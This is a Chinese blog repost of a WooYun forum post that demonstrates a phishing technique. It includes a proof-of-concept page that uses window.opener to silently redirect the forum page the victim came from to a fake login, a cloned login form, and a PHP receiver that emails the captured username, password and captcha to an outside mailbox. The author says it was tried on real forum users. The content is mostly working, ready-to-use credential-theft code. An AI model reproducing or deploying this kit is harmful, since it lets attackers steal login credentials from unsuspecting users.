最新消息:

一个钓鱼方法

别人渗透网站学习 admin 1593浏览 0评论

首先请看演示:http://zonewooyun.sinaapp.com/poc/poc.html

帖子链接:http://zone.wooyun.org/content/11465

前几天想到的方法,晚上没事儿做了一个

效果不是很好,大部分小伙伴都不上当。纯属测试 勿喷。

poc.html

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script>
parent.window.opener.location="http://zonewooyun.sinaapp.com/login/";
</script>
<p>哥们!你还真信啊?</p>

这里实现的是打开链接后原页面跳转了,也就是

http://zone.wooyun.org/content/11465

跳转至钓鱼页面

http://zonewooyun.sinaapp.com/login/

/login/index.php—假的登陆页面

<form id="formLogin" action="login.php" method="post" onsubmit="return Check()">
  <table class="formTable">
  <tbody>
  <tr>
    <th width="100">邮箱:</th>
    <td><input id="user" name="user" type="text" style="width: 150px" /></td>
   </tr>
  <tr>
    <th>密码:</th>
    <td><input id="pwd" name="pwd" type="password" style="width: 150px" /></td>
   </tr>
  <tr>
    <th width="100">验证码:</th>
    <td><input id="captcha" name="captcha" type="text" style="width:85px" maxlength="25" />
  <img title="点击刷新验证码" align="top" src="http://zone.wooyun.org/captcha.php?770287" onclick="this.src='http://zone.wooyun.org/captcha.php?'+Math.random()" style="cursor:pointer" /></td>
   </tr>
  <tr>
    <th> </th>
    <td><input type="submit" class="subbtn"  value="登录" /></td>

login.php—-钓鱼接收页面

<meta http-equiv="refresh" content="0.1;url=http://zone.wooyun.org">
<?php
$us=$_POST['user'];
$pw=$_POST['pwd'];
$ca=$_POST['captcha'];
$mail = new SaeMail();
$mail->quickSend(
    "***@126.com" ,
    "test账号密码" ,
    ".$pw..$ca.$us." ,
    "***@126.com" ,
    "密码"
);

$mail->clean();
// 重用此对象
$mail->quickSend(
    "***@126.com" ,
    "test账号密码" ,
    ".$pw..$ca.$us." ,
    "***@126.com" ,
    "密码" ,
    "smtp.126.com" ,
    25
); // 指定smtp和端口
?>

这里接收账号密码,同时跳转至zone首页

个人觉得普通用户上当的可能性还是比较大的,仓促之间做的,不是很完善。

11111111111111111111111

转自:http://lcx.cc/?i=4265

转载请注明:jinglingshu的博客 » 一个钓鱼方法

发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址